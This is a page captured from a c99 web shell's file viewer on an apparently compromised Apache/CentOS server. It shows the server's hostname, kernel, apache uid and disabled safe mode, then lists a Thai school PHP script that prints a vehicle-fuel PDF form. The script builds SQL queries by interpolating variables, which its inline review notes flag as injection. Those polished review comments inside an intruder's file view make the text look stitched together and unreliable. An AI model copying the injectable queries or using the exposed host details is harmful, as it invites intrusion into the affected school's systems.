!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 52.64 GB of 127.8 GB (41.19%)


Viewing file:     prePrintCarOil2.php (16 KB)      -rw-r--r--
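// NOTE(review): this listing starts mid-file. The opening tag, the includes and
// the assignments of $dbObj, $myTable2, $myTable3, $carId, $Teacher_code and
// $CarNo are not shown, so where those values come from cannot be checked here.
//
// NOTE(review): every query below is built by interpolating variables straight
// into the SQL text ($carId, $Teacher_code, $CarNo, and values read back from
// earlier rows). If any of them is request-derived, this is SQL injection.
// With the mysql_* API used here the minimum is mysql_real_escape_string() on
// each value (check magic_quotes_gpc first to avoid double escaping); bound
// parameters through mysqli or PDO are the durable fix. Table names
// ($myTable2, $myTable3) cannot be bound and need an allow-list instead.

/* (opening of this comment is cut off in the listing) tech_plan_tb */
$query1 = " SELECT * FROM $myTable2 WHERE carId='$carId' AND Teacher_code='$Teacher_code' ";
$result1 = $dbObj->execQuery($query1);
$rs1 = $dbObj->fetchArray($result1);

// Fuel record (autocar_tb).
// NOTE(review): $rs11 is overwritten by the requester lookup before it is
// read; this query looks unused, but execQuery() is not visible, so it stays.
$query11 = " SELECT * FROM autocar_tb WHERE carId='$carId' ";
$result11 = $dbObj->execQuery($query11);
$rs11 = $dbObj->fetchArray($result11);

// First request row for this teacher; $rs3 feeds the province lookup below.
$query = " SELECT * FROM formcaroffice Where Teacher_code='$Teacher_code' Group By CarNo ";
$result = $dbObj->execQuery($query);
$rs3 = $dbObj->fetchArray($result);
//$Teacher_code = $rss['Teacher_code'];

/** Table --> techplan_method_tb */
// NOTE(review): $rs2 is replaced by the province query before it is read.
$query2 = " SELECT * FROM $myTable3 WHERE ProvinceId='$rs1[ProvinceId]' ";
$result2 = $dbObj->execQuery($query2);
$rs2 = $dbObj->fetchArray($result2);

// Detail rows for the table part of the form (one row per fuel record).
$query = " SELECT * FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' ";
$result5 = $dbObj->execQuery($query);
$numrows = $dbObj->_numrows;

/**
 * Return the name whose month code loosely equals $mm, or $mm as a string
 * when no code matches. The loose == keeps the original behaviour of
 * accepting both the integer 1 and the string '01'.
 */
function caroil2MonthLookup($mm, $codeOf)
{
    foreach ($codeOf as $name => $code) {
        if ($mm == $code) {
            return $name;
        }
    }
    return "$mm";
}

/** Full Thai month name for a month number ('01'..'12' or 1..12). */
function getMonthTh($mm)
{
    return caroil2MonthLookup($mm, array(
        'มกราคม'     => '01',
        'กุมภาพันธ์'   => '02',
        'มีนาคม'     => '03',
        'เมษายน'     => '04',
        'พฤษภาคม'   => '05',
        'มิถุนายน'    => '06',
        'กรกฎาคม'   => '07',
        'สิงหาคม'    => '08',
        'กันยายน'    => '09',
        'ตุลาคม'     => '10',
        'พฤศจิกายน'  => '11',
        'ธันวาคม'    => '12',
    ));
}

/** Abbreviated Thai month name for a month number ('01'..'12' or 1..12). */
function getShortMonthTh($mm)
{
    return caroil2MonthLookup($mm, array(
        'ม.ค.'  => '01',
        'ก.พ.'  => '02',
        'มี.ค.' => '03',
        'เม.ย.' => '04',
        'พ.ค.'  => '05',
        'มิ.ย.' => '06',
        'ก.ค.'  => '07',
        'ส.ค.'  => '08',
        'ก.ย.'  => '09',
        'ต.ค.'  => '10',
        'พ.ย.'  => '11',
        'ธ.ค.'  => '12',
    ));
}

/**
 * Split a 'YYYY-MM-DD' string into array(day, month number, Buddhist-era year).
 * Missing parts yield 0 (and 543 for the year), as the inline code did, but
 * without the undefined-offset notices.
 */
function caroil2ThaiDate($isoDate)
{
    $parts = explode("-", $isoDate);
    return array(
        intval(isset($parts[2]) ? $parts[2] : 0),
        intval(isset($parts[1]) ? $parts[1] : 0),
        intval($parts[0] + 543),
    );
}

/** Print $text centred in a 5 mm high cell at ($x, $y), or '-' when $present is false. */
function caroil2CellOrDash($pdf, $x, $y, $width, $present, $text)
{
    $pdf->SetXY($x, $y);
    $pdf->Cell($width, 5, $present ? $text : '-', 0, 0, 'C');
}

// Create the PDF (landscape A4, millimetres), select the Thai font and lay
// the scanned form underneath as a full-page background image.
$pdf = new FPDF('L' , 'mm' , 'A4');
$pdf->SetThaiFont();
$pdf->AddPage();
$pdf->Image('../form/caroil2.jpg', 0, 0, 297, 210);
$pdf->SetFont('AngsanaNew','',13);

//-- Request number
caroil2CellOrDash($pdf, 22, 33.5, 45, !empty($CarNo), $CarNo);

//-- Date the car is requested from
$query1 = " SELECT * FROM formcaroffice WHERE CarNo='$CarNo' ";
$result1 = $dbObj->execQuery($query1);
$rs = $dbObj->fetchObject($result1);
list($day, $monthNo, $year) = caroil2ThaiDate($rs->Date_start);
$month = getMonthTh($monthNo);
caroil2CellOrDash($pdf, 105, 33.5, 20, !empty($day), "$day "." "." $month "." "." $year");

//-- End date
// Fix: the '-' placeholder used to be drawn at x=105, on top of the start-date
// field; it now goes to x=160 where the end date itself is printed.
list($day, $monthNo, $year) = caroil2ThaiDate($rs->Date_finish);
$month = getMonthTh($monthNo);
caroil2CellOrDash($pdf, 160, 33.5, 20, !empty($day), "$day "." "." $month "." "." $year");

//-- Departure time
$Time_start = $rs->Time_start;
caroil2CellOrDash($pdf, 218, 33.5, 10, !empty($Time_start), $Time_start);

//-- Arrival time
$Time_finish = $rs->Time_finish;
caroil2CellOrDash($pdf, 260.5, 33.5, 10, !empty($Time_finish), $Time_finish);

//-- Requester name
$sql11 = " Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code='$Teacher_code' ";
$result11 = mysql_query($sql11);
$rs11 = mysql_fetch_array($result11);
// Array keys are quoted now; the bare First_name / Teacher_name forms only
// worked through PHP's undefined-constant fallback.
caroil2CellOrDash(
    $pdf, 42, 40, 30, !empty($Teacher_code),
    $rs11['First_name']." ".$rs11['Teacher_name']." ".$rs11['Teacher_lastname']
);

//-- Purpose (cut to 70 bytes, '--' appended when something was cut)
// NOTE(review): substr() counts bytes; with a multi-byte encoding the cut can
// land inside a character. The encoding in use is not visible here.
$Training_name = $rs->Training_name;
$cutstr = substr($Training_name,0,70);
$purposeText = (strlen($Training_name) > 70) ? $cutstr.'--' : $cutstr;
caroil2CellOrDash($pdf, 141.5, 40, 80, !empty($Training_name), $purposeText);

//-- Province
$query2 = " SELECT * FROM $myTable3 WHERE provinceId='$rs3[provinceId]' ";
$result2 = $dbObj->execQuery($query2);
$rs2 = $dbObj->fetchArray($result2);
caroil2CellOrDash($pdf, 243, 40, 30, !empty($rs2['provinceName']), $rs2['provinceName']);

// Aggregates for this request. The original ran five separate queries here and
// four of them again for the totals row; they all aggregate the same join, so
// one query is issued and its row reused.
$sqlTotals = " SELECT min(Mile_start) Mile_start, max(Mile_finish) Mile_finish,"
           . " SUM(Num_Mile) AS SumB4, SUM(Num_Lish) AS SumB5, SUM(PriceOill) AS SumB6"
           . " FROM autocar_tb at , formcaroffice fc"
           . " WHERE at.carId=fc.carId and fc.CarNo='$CarNo' ";
$totals = mysql_fetch_array(mysql_query($sqlTotals));

//-- Odometer reading at start
caroil2CellOrDash($pdf, 57, 46.5, 15, !empty($totals['Mile_start']),
    number_format($totals['Mile_start'], 0, '', ','));

//-- Odometer reading at finish
caroil2CellOrDash($pdf, 112, 46.5, 15, !empty($totals['Mile_finish']),
    number_format($totals['Mile_finish'], 0, '', ','));

//-- Total distance
caroil2CellOrDash($pdf, 155.5, 46.5, 15, !empty($totals['SumB4']),
    number_format($totals['SumB4'], 0, '', ',')." กม.");

//-- Fuel quantity
caroil2CellOrDash($pdf, 205, 46.5, 15, !empty($totals['SumB5']),
    number_format($totals['SumB5'], 0, '', ','));

//-- Amount of money
caroil2CellOrDash($pdf, 248, 46.5, 15, !empty($totals['SumB6']),
    number_format($totals['SumB6'], 2, '.', ','));

//-- Detail table
// Baseline (mm) of each of the ten printable rows on the form. Rows past the
// tenth were never printed by the original switch either; the loop now stops
// there instead of running their lookups for nothing.
$rowY = array(1 => 77.5, 2 => 84, 3 => 91, 4 => 98, 5 => 104.5,
              6 => 111, 7 => 117.5, 8 => 124, 9 => 131, 10 => 138);
if ($numrows) {
    $i = 1;
    while ($rs7 = $dbObj->fetchArray($result5)) {
        if (!isset($rowY[$i])) {
            break;
        }
        $y = $rowY[$i];

        // Date of this row, Buddhist era, full month name.
        list($day, $monthNo, $year) = caroil2ThaiDate($rs7['DateCar']);
        $month = getMonthTh($monthNo);

        // Vehicle record, for its CodeNo.
        // NOTE(review): die() with mysql_error() sends the raw database error
        // to the client; log it server-side and show a generic message instead.
        $CarmoId = $rs7["CarmoId"];
        $sql = "Select * From automobile_tb Where CarmoId ='$CarmoId'";
        $result1 = mysql_query($sql) or die("Error".mysql_error());
        $rs2 = mysql_fetch_array($result1);

        // Fuel record again, for the second date column (short month name).
        $query11 = " SELECT * FROM autocar_tb WHERE carId='$rs7[carId]' ";
        $result11 = $dbObj->execQuery($query11);
        $rs11 = $dbObj->fetchArray($result11);
        list($day1, $month1, $year1) = caroil2ThaiDate($rs11['DateCar']);
        $m1 = getShortMonthTh($month1);

        // Person named on the row.
        $name1 = $rs7["name1"];
        $sql = "SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code ='$name1'";
        $result1 = mysql_query($sql) or die("Error".mysql_error());
        $rs33 = mysql_fetch_array($result1);

        $pdf->Text(34, $y, "$day"." "."$month"." "."$year");
        $pdf->Text(63, $y, $rs7['Time_start']." น.");
        $pdf->Text(80, $y, $rs2['CodeNo']);
        $pdf->Text(112, $y, number_format($rs7['Mile_start'], 0, '', ','));
        $pdf->Text(135, $y, "$day1"." "."$m1"." "."$year1");
        $pdf->Text(165, $y, number_format($rs7['Mile_finish'], 0, '', ','));
        $pdf->Text(197, $y, $rs7['Num_Mile']);
        $pdf->Text(220, $y, $rs7['Num_Lish']);
        $pdf->Text(240, $y, $rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']);

        $i++;
    }
}

// Totals row under the table, in bold. Unlike the header fields these are
// printed unconditionally, so an empty result shows as 0.
$pdf->SetFont('AngsanaNew','B',13);
$pdf->SetXY(110,140);
$pdf->Cell(15,5,number_format($totals['Mile_start'], 0, '', ','),0,0,'C');
$pdf->SetXY(163,140);
$pdf->Cell(15,5,number_format($totals['Mile_finish'], 0, '', ','),0,0,'C');
$pdf->SetXY(193,140);
$pdf->Cell(15,5,number_format($totals['SumB4'], 0, '', ','),0,0,'C');
$pdf->SetXY(216,140);
$pdf->Cell(15,5,number_format($totals['SumB5'], 0, '', ','),0,0,'C');

// Send the finished document to the client.
$pdf->Output();
?>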

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--